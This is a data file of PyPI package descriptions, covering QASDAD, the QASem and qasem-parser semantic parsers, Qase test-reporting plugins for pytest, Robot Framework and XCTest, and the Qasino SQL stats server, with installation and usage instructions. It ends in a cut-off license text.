changes.QASDAD is written by Volker Wei\u00dfmann, a German physics student at the University\nof Stuttgart.\nFor licensing issues, bug reports, feature requests etc.\ncontact me atvolker.weissmann@gmx.de.\nThis program is free software (free as in freedom)\nand you can find the full license of this program in LICENSE.TXT\nThe direct dependencies of QASDAD arePython 3 (https://www.python.org, not included, needs to be installed separately)Scipy (https://www.scipy.org, not included, needs to be installed separately)Numpy (http://www.numpy.org, not included, needs to be installed separately)Matplotlib (https://matplotlib.org/, not included, needs to be installed separately)Sympy (https://www.sympy.org, not included, needs to be installed separately)latex2sympy (https://gitlab.com/volkerweissmann/latex2sympy, not included, needs to be installed separately)You can also install QASDAD using python3 -m pip install qasdadpGood Luck.QASDAD, the quick and simple data analysis and documentation program\nCopyright (C) 2018 Volker Wei\u00dfmann . Contact:volker.weissmann@gmx.deThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU Affero General Public License as\npublished by the Free Software Foundation, either version 3 of the\nLicense, or (at your option) any later version.This program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU Affero General Public License for more details.You should have received a copy of the GNU Affero General Public License\nalong with this program. 
If not, seehttps://www.gnu.org/licenses/."} +{"package": "qaseio", "pacakge-description": "Qase TestOps API Specification."} +{"package": "qasem", "pacakge-description": "QASem - Question-Answer based SemanticsThis repository includes software for parsing natural language sentence with various layers of QA-based semantic annotations.\nWe currently support three layers of semantic annotations - QASRL, QANom, and QADiscourse.\nSee an overview of our approach at our paper onQASem Parsing.QASRL (Question Answer driven Semantic Role Labeling)is a lightweight semantic framework for annotating \"who did what to whom, how, when and where\".\nFor every verb in the sentence, it provides a set of question-answer pairs, where the answer mark a participant of the event denoted by the verb, while the question captures itssemantic role(that is, what is the role of the participant in the event).\"QANom\" stands for \"QASRL for Nominalizations\", which is an adaptation of QASRL to (deverbal) nominalization. See theQANom paperfor details about the task.You can find more information onQASRL's official website, including links to all the papers and datasets and a data browsing utility.\nWe also wrapped the datasets into Huggingface Datasets (QASRL;QANom), which are easier to plug-and-play with (check out ourHF profilefor other related datasets, such as QAMR, QADiscourse, and QA-Align).QADiscourseannotates intra-sentential discourse relations with question-answer pairs. It focus on discourse relations that carry information, rather than specifying structural or pragmatic properties of the realied sentencs. Each question starts with one of 17 crafted question prefixes, roughly mapped into PDTB relation senses.Note: In the future, we will also combine additional layers of QA-based semantic annotations for adjectives and noun modifiers, currently at the stage of ongoing work.DemoCheck out thelive QASem demoon Huggingface.InstallationPre-requisite: Python 3.8 (as of version 0.2.0; before that - Python 3.7)Installation is available via pip:pipinstallqasemInstallation from sourceClone the repo and install usingsetup.py:gitclonehttps://github.com/kleinay/QASem.gitcdQASem\npipinstall-e.Alternatively, If you want to install the dependencies explicitly:pipinstalltransformers==4.15.0spacy>=2.3.7qanompipinstallgit+https://github.com/rubenwol/RoleQGeneration.gitIn addition, you would need to download a spacy model for pre-requisite tokenization & POS-tagging:python-mspacydownloaden_core_web_smUsageTheQASemEndToEndPipelineclass would, by demand, parse sentences with any of the QASem semantic annotation layers --- currenlty including 'qasrl', 'qanom' and 'qadiscourse'.FeaturesRun on GPU:Usedevice=din initialization to put models and tensors on a GPU device, wheredis the CUDA device ID. We currently do not support parallelization on multiple GPUs. Defaults todevice=-1, i.e. CPU.Annotation layers:By default, the pipeline would parse all layers.\nTo specify a subset of desired layers, e.g. QASRL and QADiscourse alone, useannotation_layers=('qasrl', 'qadiscourse')in initialization.QA-SRL contextualization:For the sake of generality, QA-SRL and QANom generate ``abstractive'' questions, that replace arguments with placeholders, e.g. \"Why wassomeoneinterested insomething?\". However, in some use-cases you might want to have a more natural question with contextualized arguments, e.g. \"Why wasthe doctorinterested inLuke 's treatment?\". Utilizing the model fromPyatkin et. 
al., 2021, one can additionally get contextualized questions for QA-SRL and QANom by settingQASemEndToEndPipeline(contextualize=True)(see example below).QA-SRL Discrete Roles:In QA-SRL, semantic roles are captured in a rich but soft manner within the questions. For some applications, a reduced discrete account of semantic roles may be desired. By default (return_qasrl_discrete_role=Truein initialization), we provide a discrete \"question-role\" label per question in the output, based on a heuristic mapping from the question syntactical structure. For the core arguments, \"R0\" corresponds to asking about the subject position (commonly equivalent to proto-agent semantic roles), \"R1\" to direct object (proto-patient), \"R2\" to a second direct object, and \"R2_\" to an indirect object (e.g. \"R2_on\" <-> \"what did someone put somethingon?\"). For modifiers (\"where\", \"when\", \"how\", \"why\", \"how long\", \"how much\") the WH-word (plus, optionally, the preposition) is defining the \"question-role\". See Table 7 at theQA-SRL 2015 paperfor more details about the set of Roles and the heuristic mapping.QA-SRL Question slots:Setreturn_qasrl_slots=Truein initialization to get detailed information about each QA-SRL question. This includes the 7 slots comprising the question, the verb inflection, voice (\"is_passive\") and negation (\"is_negated\").Nominal predicate detection:nominalization_detection_threshold--- which can be set globally in initialization and per__call__--- is the threshold for the nominalization detection model.\nA higher threshold (e.g.0.8) means capturing less nominal predicates with higher confidence of them being, in context, verb-derived event markers. Default threshold is0.7.OpenIE converter:Setoutput_openie=True(in__call__) in order to get a reduction of output QAs into Open Information Extraction's tuples format. 
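(In practice that presumably means a call of the form outputs = pipe(sentences, output_openie=True) on an already-constructed QASemEndToEndPipeline instance, since the option is passed to __call__ rather than to the constructor; the keyword placement here is inferred from the description above.)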
This option uses theqasem.openie_converter.OpenIEConverterclass to linearize the arguments along with the predicate by the order of occurrence in the source sentence.\nThe pipeline's output would then be in the form{\"qasem\": , \"openie\": }.By default, only verbal QA-SRL QAs would be converted, but one can specifylayers_included=[\"qasrl\", \"qanom\"]when initializingOpenIEConverterto also include nominalizations' QAs.\nYou can set arguments forOpenIEConverterin theQASemEndToEndPipelineconstructor using theopenie_converter_kwargsargument, e.g.QASemEndToEndPipeline(openie_converter_kwargs={\"layers_included\": [\"qasrl\", \"qanom\"]}).Examplefromqasem.end_to_end_pipelineimportQASemEndToEndPipelinepipe=QASemEndToEndPipeline(annotation_layers=('qasrl','qanom','qadiscourse'),nominalization_detection_threshold=0.75,contextualize=True)sentences=[\"The doctor was interested in Luke 's treatment as he was still not feeling well .\",\"Tom brings the dog to the park.\"]outputs=pipe(sentences)print(outputs)Outputs[{'qanom':[{'QAs':[{'question':'who was treated ?','answers':['Luke'],'contextual_question':'Who was treated?'}],'predicate_idx':7,'predicate':'treatment','predicate_detector_probability':0.8152085542678833,'verb_form':'treat'}],'qasrl':[...],'qadiscourse':[{'question':'What is the cause of the doctor being interested in Luke 'streatment?','answer':'he was still not feeling well'}]},},{'qanom':[],'qasrl':[{'QAs':[{'question':'who brings something ?','answers':['Tom'],'contextual_question':'Who brings the dog?'},{'question':' what does someone bring ?','answers':['the dog'],'contextual_question':'What does Tom bring?'},{'question':' where does someone bring something ?','answers':['to the park'],'contextual_question':'Where does Tom bring the dog?'}],'predicate_idx':1,'predicate':'brings','verb_form':'bring'}]}],'qadiscourse':[]}Repository for Model Training & ExperimentsThe underlying QA-SRL and QANom models were trained and evaluated using the code atqasrl-seq2seqrepository.The code for training and evaluating the QADiscourse model will be uploaded soon.Cite@article{klein2022qasem,\n title={QASem Parsing: Text-to-text Modeling of QA-based Semantics},\n author={Klein, Ayal and Hirsch, Eran and Eliav, Ron and Pyatkin, Valentina and Caciularu, Avi and Dagan, Ido},\n journal={arXiv preprint arXiv:2205.11413},\n year={2022}}"} +{"package": "qasem-parser", "pacakge-description": "Parser for Question-Answer based SemanticsAbout The ProjectReimplementation of theQA-SEM pipelinewith re-trained joint argument parser modelGetting StartedInstallationpipinstallqasem_parserUsagefromtypingimportListfromqasem_parserimportQasemParser,QasemFramearg_parser_path=\"cattana/flan-t5-large-qasem-joint-tokenized\"parser=QasemParser.from_pretrained(arg_parser_path)sentences=[\"The fox jumped over the fence.\",\"Back in May, a signal consistent with that of a radio beacon was detected in the area, but nothing turned up that helped with the search.\"]# frames is a list of lists, with one sublist per sentence such that len(frames) == len(sentences)# frames[i] is a sublist of the semantic frames that occur within sentence[i]frames:List[List[QasemFrame]]=parser(sentences)print(frames[1][0])# detect-v: Back in May (when: when was something detected?)# | a signal consistent with that of a radio beacon (R1: what was detected?)# | in the area (where: where was something detected?)# The parser also respects original tokenization# if the input is a batch of tokenized sentencespretokenized_sentences=[\"Unfortunately , 
extensive property damage is bound to occur even with the best preparation .\".split(),\"Afghanistan to attend the summit after following the election in June , \"\"but the ongoing audit of votes has made this impossible .\".split()]frames=parser(pretokenized_sentences)forframes_per_sentinframes:# NOTE: frames_per_sent might be empty if no predicate# is detected in the sentence.forframeinframes_per_sent:print(frame)print()## bind-v: extensive property damage (R0: what is bound to do something?)# | occur even with the best preparation (R1: what is something bound to do?)# occur-v: extensive property damage (R0: what is occurring?)# | even with the best preparation (how: how is something occurring?)# damage-n: extensive property (R1: what is damaged?)# prepare-n: extensive property damage (R1: what is prepared?)## call-v: Plans (R0: what called for something?)# | the new President , or President-elect , of Afghanistan to attend the summit after following the election in June (R1: what did something call for?)# attend-v: the new President , or President-elect , of Afghanistan (R0: who attends something?)# | the summit (R1: what does someone attend?)# | after following the election in June (when: when does someone attend something?)# follow-v: the election (R1: what was followed?)# | in June (when: when was something followed?)# make-v: the ongoing audit of votes (R0: what made something?) | this impossible (R1: what did something make?)# plan-n: Plans (R0: what planned something?)# | the new President , or President-elect , of Afghanistan to attend the summit after following the election in June , but the ongoing audit of votes has made this impossible (R1: what did something plan?)# elect-n: the new President , or President-elect , of Afghanistan (R1: what was elected?)# | in June (when: when was something elected?)# audit-n: votes (R1: what was audited?)(back to top)LicenseDistributed under the MIT License. SeeLICENSEfor more information.ContactPaul Roit -@paul_roitProject Link:https://github.com/plroit/qasem_parser(back to top)AcknowledgmentsAyal KleinArie Cattan(back to top)"} +{"package": "qase-pytest", "pacakge-description": "QasePytest PluginInstallationpip install qase-pytestUpgrade from 4.x to 5.xA new version of qase-pytest reporter has breaking changes. 
Follow theseguidethat will help you to migrate to a new version.ConfigurationQase Pytest Plugin can be configured in multiple ways:using a config fileqase.config.jsonusing environment variablesusing CLI optionsAll configuration options are listed in the following doc:Configuration.Example: qase.config.json{\n\t\"mode\": \"testops\", \n\t\"fallback\": \"report\",\n\t\"report\": {\n\t\t\"driver\": \"local\",\n\t\t\"connection\": {\n\t\t\t\"local\": {\n\t\t\t\t\"path\": \"./build/qase-report\",\n\t\t\t\t\"format\": \"json\" \n\t\t\t}\n\t\t}\n\t},\n\t\"testops\": {\n\t\t\"bulk\": true,\n\t\t\"api\": {\n\t\t\t\"token\": \"YOUR_API_TOKEN\",\n\t\t\t\"host\": \"qase.io\"\n\t\t},\n\t\t\"run\": {\n \"id\": 1,\n\t\t\t\"title\": \"Test run title\",\n\t\t\t\"complete\": true\n\t\t},\n \"plan\": {\n \"id\": 1\n },\n\t\t\"defect\": true,\n\t\t\"project\": \"YOUR_PROJECT_CODE\",\n\t\t\"chunk\": 200\n\t},\n\t\"framework\": {\n\t\t\"pytest\": {\n\t\t\t\"capture\": {\n\t\t\t\t\"logs\": true,\n\t\t\t\t\"http\": true\n\t\t\t}\n\t\t}\n\t},\n\t\"environment\": \"local\"\n}UsageLink tests with test cases in Qase TestOpsTo link tests in code with tests in Qase TestOps you can use predefined decorators:fromqaseio.pytestimportqase@qase.id(13)@qase.title(\"My first test\")@qase.fields((\"severity\",\"critical\"),(\"priority\",\"hight\"),(\"layer\",\"unit\"),(\"description\",\"Try to login in Qase TestOps using login and password\"),(\"description\",\"*Precondition 1*. Markdown is supported.\"),)deftest_example_1():passEach unique number can only be assigned once to the class or function being used.Ignore a particular testIf you want to exclude a particular test from the report, you can use the@qase.ignoredecorator:fromqaseio.pytestimportqase@qase.ignoredeftest_example_1():passPossible test result statusesPASSED - when test passedFAILED - when test failed with AssertionErrorBLOCKED - when test failed with any other exceptionSKIPPED - when test has been skippedCapture network logsIn order to capture network logs, you need to enable thehttpoption in thecapturesection of theframeworksection in the config file.Qase Pytest reporter will capture all requests and responses and save as a test step automatically.Add attachments to test resultsWhen you need to push some additional information to server you could use\nattachments:importpytestfromqaseio.pytestimportqase@pytest.fixture(scope=\"session\")defdriver():driver=webdriver.Chrome()yielddriverlogs=\"\\n\".join(str(row)forrowindriver.get_log('browser')).encode('utf-8')qase.attach((logs,\"text/plain\",\"browser.log\"))driver.quit()@qase.title(\"My first test\")deftest_example_1():qase.attach(\"/path/to/file\",\"/path/to/file/2\")qase.attach((\"/path/to/file/1\",\"application/json\"),(\"/path/to/file/3\",\"application/xml\"),)@qase.id(12)deftest_example_2(driver):qase.attach((driver.get_screenshot_as_png(),\"image/png\",\"result.png\"))You could pass as much files as you need.Also you should know, that if no case id is associated with current test in\npytest - attachment would not be uploaded:importpytestfromqaseio.pytestimportqase@pytest.fixture(scope=\"session\")defdriver():driver=webdriver.Chrome()yielddriverlogs=\"\\n\".join(str(row)forrowindriver.get_log('browser')).encode('utf-8')# This would do nothing, because last test does not have case id linkqase.attach((logs,\"text/plain\",\"browser.log\"))driver.quit()deftest_example_2(driver):# This would do nothingqase.attach((driver.get_screenshot_as_png(),\"image/png\",\"result.png\"))Linking code with stepsIt is possible to 
link test step with function, or using context.fromqaseio.pytestimportqase@qase.step(\"First step\")# test step namedefsome_step():sleep(5)@qase.step(\"Second step\")# test step namedefanother_step():sleep(3)...deftest_example():some_step()another_step()# test step hashwithqase.step(\"Third step\"):sleep(1)Sending tests to existing testrunTestrun in TestOps will contain only those test results, which are presented in testrun,\nbut every test would be executed.pytest\\--qase-mode=testops\\--qase-testops-api-token=\\--qase-testops-project=PRJCODE\\# project, where your testrun exists in--qase-testops-run-id=3# testrun idCreating test run base on test plan (selective launch)Create new testrun base on testplan. Testrun in Qase TestOps will contain only those\ntest results.qase-pytestsupports selective executionpytest\\--qase-mode=testops\\--qase-testops-api-token=\\--qase-testops-project=PRJCODE\\# project, where your testrun exists in--qase-testops-plan-id=3# testplan idCreating new testrun according to current pytest runIf you want to create a new test run in Qase TestOps for each execution, you can simply\nskip--qase-testops-runoption. If you want to provide a custom name for this run, you can add an\noption--qase-testops-run-titlepytest\\--qase-mode=testops\\--qase-testops-api-token=\\--qase-testops-project=PRJCODE\\# project, where your testrun would be created--qase-testops-run-title=My\\First\\Automated\\Run"} +{"package": "qase-python-commons", "pacakge-description": "Qase Python CommonsDescriptionThis package contains reporters for Qase TestOps and Qase Report that are used inqase-pytestandqase-robotframework.How to installpip install qase-python-commons"} +{"package": "qase-robotframework", "pacakge-description": "Qase Robot Framework ListenerPublish results simple and easy.How to integratepip install qase-robotframeworkUsageIf you want to create a persistent link to Test Cases in Qase, you should add Qase test case IDs to robot framework tests.\nThey should be added as a tags in form likeQ-. You can use upper and lower case to indicate the test case IDs. Example:*** Test Cases ***Push button[Tags]q-2Push button1Result should be1Push multiple buttons[Tags]Q-3Push button1Push button2Result should be12*** Test Cases ***ExpressionExpectedAddition12 + 2 + 2162 + -3-1[Tags]Q-7Subtraction12 - 2 - 282 - -35[Tags]Q-8Working with stepsListener supports reporting steps results:Example:Quick Get A JSON Body Test## Test case: \"Quick Get A JSON Body Test\"[Tags]Q-3${response}=GEThttps://jsonplaceholder.typicode.com/posts/1## 1-st step - \"GET\"Should Be Equal As Strings1${response.json()}[id]## 2-nd step - \"Should Be Equal As Strings\"Initializing the test case## Test case: \"Initializing the test case\"[Tags]q-4Set To Dictionary${info}field1=A sample string## 1-st step - \"Set To Dictionary\"ConfigurationListener supports loading configuration both from environment variables and fromtox.inifile.ENV variables:QASE_MODE- Define mode:testopsto enable reportQASE_ENVIRONMENT- Environment ID for the runQASE_DEBUG- If passed something - will enable debug logging for listener. Default:FalseQASE_TESTOPS_MODE- You can switch betweensyncandasyncmodes. 
Default isasyncQASE_TESTOPS_API_TOKEN- API token to access Qase TestOpsQASE_TESTOPS_PROJECT- Project code from Qase TestOpsQASE_TESTOPS_PLAN_ID- Plan ID if you want to add results to existing run from Test PlanQASE_TESTOPS_RUN_ID- Run ID if you want to add results to existing runQASE_TESTOPS_RUN_TITLE- Set custom run name when no run ID is providedQASE_TESTOPS_COMPLETE_RUN- Will complete run after all tests are finished. Default:FalseQASE_TESTOPS_HOST- Define a host for Qase TestOps. Default:qase.ioUsage:QASE_API_TOKEN= QASE_PROJECT=PRJCODE robot --listener qaseio.robotframework.QaseListener keyword_driven.robot data_driven.robotMoving variables totox.ini, example configuration:[qase]qase_testops_api_token=api_keyqase_testops_project=project_codeqase_testops_run_id=run_idqase_testops_run_title=New Robot Framework Runqase_debug=Trueqase_testops_complete_run=TrueExecution:robot --listener qaseio.robotframework.Listener someTest.robotContributionInstall project locally:python3-mvenv.venvsource.venv/bin/activate\npipinstall-e.[testing]Install dev requirements:pipinstallpre-commit\npre-commitinstallTest project:tox"} +{"package": "qase-xctest", "pacakge-description": "Qase XCTest UtilsHow to installpip install qase-xctestHow to useFor XCode--api_token YOUR_API_TOKEN- Api token for qase api. Get api tokenhere.--project_code YOUR_PROJECT_CODE- You can find project codehere.--build $BUILD_ROOT- Xcode build folder. Xcode setup$BUILD_ROOTenviroment automatically.\nAlways using this enviroment for--buildarg.--run_name From_Xcode- Arbitrary run name. You can detect your run result from all results.--upload_attachments- Send attachments from report.qasexcode--build$BUILD_ROOT\\--api_tokenYOUR_API_TOKEN\\--project_codeYOUR_PROJECT_CODE\\--run_nameFrom_Xcode\\--upload_attachmentsFor CI--xcresults- Paths to reports. If your reports will be contains one test result multiple times, enable settingsAllow to add results for cases in closed runs.in your project.qasexcode --xcresults PathToReport/1.xcresult PathToReport/2.xcresult \\\n --api_token YOUR_API_TOKEN \\\n --project_code YOUR_PROJECT_CODE \\\n --run_name From_ci \\\n --upload_attachments"} +{"package": "qashared", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qasimpdf", "pacakge-description": "This is the home page of application"} +{"package": "qasino_client", "pacakge-description": "Qasino======Qasino is a stats server that supports stats stored as tables in adatabase for querying with SQL. Unlike a conventional database, statsdo not accumulate over time (which would make querying the stats moredifficult). Instead Qasino keeps only the most recent set of statsreported. The full flexiblity of SQL including joining, filtering andaggregation are availble to analyze the current state of your network.Stats reported from different systems but using the same table nameare merged automatically into a single table. In addition schemas areautomatically created and updated based on the incoming updatesrequiring zero maintanence.Many stats systems provide history for stats but lack an effective wayto join, correlate or connect stats together. Qasino does not(directly) keep a history of stats but does make it really easy tocorrelate and cross reference stats together.Sometimes you want to know the current state of your systems and thatmight include more then just numerical data. Qasino excels at givingyou that information. You can report a richer set of data such astext data, datetimes or multi-row relationships. 
For example, cpuusage and ops per second, or configuration files with the md5sum ofeach and current timestamp.Qasino primarily is a server process. It exposes interfaces topublish tables to it using a JSON API via HTTP or ZeroMQ. There is asimple CLI client to connect to Qasino and run queries. There is asimple command line table publisher that can read input tables as CSVor JSON. And there is a more advanced publisher client meant to runas an agent that dynamically publishes CSV files.In the future there will be integration with stat collectors likeStatsd, Diamond and Graphite.Currently Qasino is implemented in Python using the Twisted frameworkand HTTP and ZeroMQ transports with Sqlite for the backend data store.Qasino was inspired by the monitoring system used at AkamaiTechnologies called Query. More information can be found[here](http://www.akamai.com/dl/technical_publications/lisa_2010.pdf \"Keeping Track of 70,000+ Servers: The Akamai Query System\")and [here](http://www.akamai.com/dl/technical_publications/query_osr.pdf \"Scaling a Monitoring Infrastructure for the Akamai Network\").Qasino provides similar functionality but for much smaller scale environments.##Installation###Git cloneTo run qasino, you can clone this repo. You'll need to have the followingPython libraries installed:- python-twisted- python-zmq- python-apsw- python-yaml- python-requests- python-txzmq- python-jinja2The server and the client can be run right from the main directory.They will find the libraries they need in the lib directory. To run the server:python bin/qasino_server.pyConnect with the SQL client:python bin/qasino_sqlclient.py -Hqasino-server-hostnameTo run the CSV publisher:python bin/qasino_csvpublisher.py --identity 1.2.3.4 --index-file index.csv###DockerAlternately, you can build qasino using [Docker](https://www.docker.com/).This will let you deploy qasino in a Docker container. Simply call the Dockerbuild command on the Dockerfile included in this repo:docker build -t=\"my-container-name\" /path/to/qasino/To run the qasino server using Docker, call `docker run` on the container youbuilt. You need to use the `-P` flag (or set port mappings manually) in orderto send requests to the qasino server. For example:docker run -P my-container-name /opt/qasino/bin/qasino_server.pyYou can find the ports that Docker assigned to your qasino container using`docker ps`.###Pip (client only)You can also install the qasino SQL client using `pip`. This will let you querya qasino server from the command line (like running the`bin/qasino_sqlclient.py` program). This should work on most Linux / OS Xcomputers:pip install qasino_clientAfterwards, the command `qasinosql` will start a command line interface to aqasino server. `qasinosql` takes the same flags as `qasino_sqlclient.py`; infact, the former is simply a wrapper around the latter. For example:qasinosql -H 1.2.3.4 -p 15598##OverviewThe qasino server receives requests from clients to publish tabulardata. The data is added to a backend sqlite database. The data iscollected for a fixed period (default 30 seconds) after which it issnapshotted. The snapshotted database becomes the data source for allincoming SQL requests until the next snapshot. For this reason allpublishers need to publish updated stats every snapshot period (withthe exception of static tables or persistent tables which aredescribed below).To orchestrate this process better the server publishes on a ZeroMQpub-sub channel the snapshot (aka generation) signal. 
This shouldtrigger all publishers to send table data. qasino_cvspublisher worksthis way. It is by no means required though. In fact a simplerapproach is just to have all publishers publish their data on aninterval that matches the generation interval.##Querying (SQL)Qasino has a SQL interface. Since Qasino uses SQLite on the backendyou can refer to the [SQLite SQL documentation](http://www.sqlite.org/lang.html)for SQL syntax details. Qasino can be queried with SQL using four different methods:###Web UIPoint your browser at Qasino and you'll get a basic web interface.The default page shows all the tables that Qasino knows about. Thereare also tabs for describing tables and inputing custom SQLstatements.###Line receiverConnect to a qasino server on port 15000 for line based text only queries. You cansimply connect using telnet and send your query.$ telnet 1.2.3.4 15000Trying 1.2.3.4...Connected to 1.2.3.4.Escape character is '^]'.select * from qasino_server_info;generation_number generation_duration_s generation_start_epoch================= ===================== ======================1382105093 30 1382105123.11 rows returned###Python ClientConnect using bin/qasino_sqlclient.py. This client uses ZeroMQ tosend JSON formated messages to the server. (It can also connect usingHTTPS given the --use-https option but that will require the rightcredentials to work).$ bin/qasino_sqlclient.py -H1.2.3.4Connecting to 1.2.3.4:15598.qasino> select * from qasino_server_info;generation_number generation_duration_s generation_start_epoch================= ===================== ======================1382119193 30 1382119223.11 rows returnedqasino>It uses a json message with the following simple format:{\"op\" : \"query\",\"sql\" : \"select * from qasino_server_info;\"}###HTTP InterfaceLastly you can connect with a simple HTTP request. The default HTTPport is 15597. These requests can also go to the SSL port 443 butwill require basic auth. There are a couple variations.First you can POST a JSON request:$ curl -X POST 'http://1.2.3.4:15597/request?op=query' -d '{ \"sql\" : \"select * from qasino_server_info;\" }'{\"table\": {\"rows\": [[\"1382119553\", \"30\", \"1382119583.1\"]], \"column_names\": [\"generation_number\", \"generation_duration_s\", \"generation_start_epoch\"]}, \"max_widths\": {\"1\": 21, \"0\": 17, \"2\": 22}, \"response_op\": \"result_table\", \"identity\": \"1.2.3.4\"}$Or you can make a GET request with 'sql' as a query string param (be sure to url-encode it):$ curl 'http://localhost:15597/request?op=query' --get --data-urlencode 'sql=select * from qasino_server_info;'{\"table\": {\"rows\": [[\"1382131545\", \"30\", \"1382131575.89\"]], \"column_names\": [\"generation_number\", \"generation_duration_s\", \"generation_start_epoch\"]}, \"max_widths\": {\"1\": 21, \"0\": 17, \"2\": 22}, \"response_op\": \"result_table\", \"identity\": \"1.2.3.4\"}Or make a GET request with the 'format=text' query string parameter to get a human readable rendering of the table. 
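Because the default responses are plain JSON, the same documented endpoint is easy to call from a script; a minimal sketch using Python's requests library with the host and query from the curl examples above (this just mirrors the documented parameters, it is not an extra client shipped with qasino):
import requests
resp = requests.get('http://1.2.3.4:15597/request', params={'op': 'query', 'sql': 'select * from qasino_server_info;'})
table = resp.json()['table']        # same JSON shape as the curl output above
print(table['column_names'])
for row in table['rows']:
    print(row)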
Note you can also put this url right in a browser.$ curl 'http://1.2.3.4:15597/request?op=query&format=text' --get --data-urlencode 'sql=select * from qasino_server_info;'generation_number generation_duration_s generation_start_epoch================= ===================== ======================1382131635 30 1382131665.891 rows returned$###Internal TablesQasino server automatically publishes the following internal tables:- qasino_server_info- qasino_server_tables- qasino_server_connections- qasino_server_viewsThe following commands are shortcuts to looking at these tables:- SHOW info;- SHOW tables;- SHOW connections;- SHOW views;The schema for a table can be found with 'DESC ;' and thedefinition of a view can be found with 'DESC VIEW ;'##PublishingCurrently the only publishing clients officially implemented are a CSVfile publisher that is meant to run as an agent remotely and publishesCSV files as tables (qasino_csvpublisher.py) and a command lineutility to publish one-offs from JSON or CSV input files (qasino_publish.py).All publishers must specify an \"identity\" which is a unique identifierthat tells the server where the input table is coming from. A giventablename can only be reported from the same identity once perreporting cycle but different identities can report rows for the sametablename - the results will be merged together.A common paradigm is to make the identity the hostname or IP addressof the machine reporting the rows. In addition it is suggested toinclude a column in the table that indicates the same thing (identity,hostname or IP address). In this way, two nifty things happen:1. All machines reporting rows for a common table (lets say 'table_foo') will be merged together.2. You can make queries that select by machine e.g. \"SELECT * FROM table_foo WHERE identity IN ('1.2.3.4', '5.6.7.8');\"###Schema MergingTypically all your publishers have the same schema for a given tablebut if its different (perhaps if you are rolling out a new releasethat adds columns to a table) the server will always add columns thatdon't already exist in the table. The schema you will end up withwill be a union of all the columns.Changing types of an existing column is not recommended (there may besome undefined behavior). Just add a new column with the differenttype.###TypesCSV input tables (see below) support the following types (and are converted into the types in the JSON list below):- string (also str)- ip (alias for string)- float- integer (also int)- ll (alias for integer)- time (alias for integer)JSON input tables (see below) support the following types (which are sqlite types):- integer- real- text###Qasino_csvpublisher.pyqasino_csvpublisher.py takes an index file with a list of CSV files init to publish and/or a index list file with a list of index files toprocess in the same way. It runs until killed and monitors theindexes and tables they refer to for changes. The data is continuallypublished to the server every cycle so that the CSV content is alwaysreflected in tables on the server. 
The intent is so that applicationsor processes can simply drop properly formated CSV files intolocations and they will automatically get loaded and published to theserver.####Index File FormatAn index file starts with a version number followed by one or more CSV tables to publish.Each line specifying a table to publish contains either a filename and tablename or just a tablename where the filename is inferred.So either:,or justIn the latter case the filename is inferred to be `.csv`.So for example you might have an index file `myindex.csv` like the following:1myapplication_table1myapplication_table2####CSV File FormatThe CSV files contain the following format:...So for example you might create a file `myapplication_table1.csv`:1myapplication_table1ipaddr,datacenter,stat1,stat2ip,string,integer,integerIP Address,Datacenter,Num Frobs,Num Foobs1.2.3.4,BOS,123,456And then you might run the csv publisher like this:python bin/qasino_csvpublisher.py --index myindex.csv --identity 1.2.3.4###Qasino_publish.pyThe command line utility qasino_publish.py reads from file or stdin aninput table (CSV or JSON) and sends it via HTTP, HTTPS or ZeroMQ to aserver. Its largely meant as an example client but could be used in acron or script. See --help for more information. See above for CSV file format.###HTTP PublishingYou can publish by sending a properly formatted JSON request via an HTTP connection.For example to publish the same \"myapplication_table1\" table you could put the following in a file `myapplication_table1.json`:{ \"op\" : \"add_table_data\",\"identity\" : \"1.2.3.4\",\"table\" : { \"tablename\" : \"myapplication_table1\",\"column_names\" : [ \"ipaddr\", \"datacenter\", \"stat1\", \"stat2\" ],\"column_types\" : [ \"ip\", \"string\", \"int\", \"int\" ],\"rows\" : [ [ \"1.2.3.4\", \"BOS\", 123, 456 ] ]}}And then send the following curl:$ curl -d @myapplication_table1.json -X POST 'http://1.2.3.4:15597/request?op=add_table_data'{\"identity\": \"1.2.3.4\", \"response_op\": \"ok\"}$The table should appear in Qasino. Publishing would have to happen regularly for it to persist.$ bin/qasino_sqlclient.pyConnecting to 1.2.3.4:15598.qasino> select * from qasino_server_tables where tablename = 'myapplication_table1';tablename====================myapplication_table11 rows returnedqasino> select * from myapplication_table1;ipaddr datacenter stat1 stat2======= ========== ===== =====1.2.3.4 BOS 123 4561 rows returnedqasino>###Persistent tablesA node can publish a table with the option 'persist' to indicate thatthe table should be carried through each generation. An option isgiven in the top level dict of the JSON object. For example:{ \"op\" : \"add_table_data\",\"persist\" : 1,\"identity\" : \"1.2.3.4\",\"table\" : { \"tablename\" : \"myapplication_table1\",\"column_names\" : [ \"ipaddr\", \"datacenter\", \"stat1\", \"stat2\" ],\"column_types\" : [ \"ip\", \"string\", \"int\", \"int\" ],\"rows\" : [ [ \"1.2.3.4\", \"BOS\", 123, 456 ] ]}}Some things to note.- The stats are carried forward for each successive generation so that means the server has to hold onto an extra copy of the stats which can consume additional memory.- If the server is restarted the persistent stats will go away until they are resent.- The tables are tracked per tablename (at the moment), so multiple updates for the same table overwrite.###Static tablesStatic tables are set using the \"static\" option similar to persistabove but get loaded into a special persistent Sqlite DB that isconnected to the ephemeral databases. 
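Presumably the request mirrors the persist example above, i.e. the top-level dict of the add_table_data message carries 'static' : 1 in place of 'persist' : 1 with the rest of the payload unchanged; only the option name 'static' is stated explicitly, so the exact placement is an assumption.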
Tables that are static persistbetween Qasino server restarts. They are also stored by tablename somultiple updates to the same table overwrite.###ViewsViews are supported by using a view configuration file. The Qasinoserver will look by default (change it with the --views-file option)for a file in the current directory called 'views.conf' that is a YAMLfile that has the following format:---- viewname: testviewview: |create view testview as select* from qasino_server_info;- viewname: anotherviewview: |create view anotherview as select* from qasino_server_tables;It is an array of items with 'viewname' and 'view' properties. The'view' property specifies the actual view to create.The views file is monitored for changes and automatically reloaded.You can get the definition of a view from the qasino_server_viewstable or the 'DESC VIEW' command."} +{"package": "qask", "pacakge-description": "qaskCreate default skeleton app for new qa project"} +{"package": "qasm", "pacakge-description": "TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTIONDefinitions.\u201cLicense\u201d shall mean the terms and conditions for use, reproduction,\nand distribution as defined by Sections 1 through 9 of this document.\u201cLicensor\u201d shall mean the copyright owner or entity authorized by\nthe copyright owner that is granting the License.\u201cLegal Entity\u201d shall mean the union of the acting entity and all\nother entities that control, are controlled by, or are under common\ncontrol with that entity. For the purposes of this 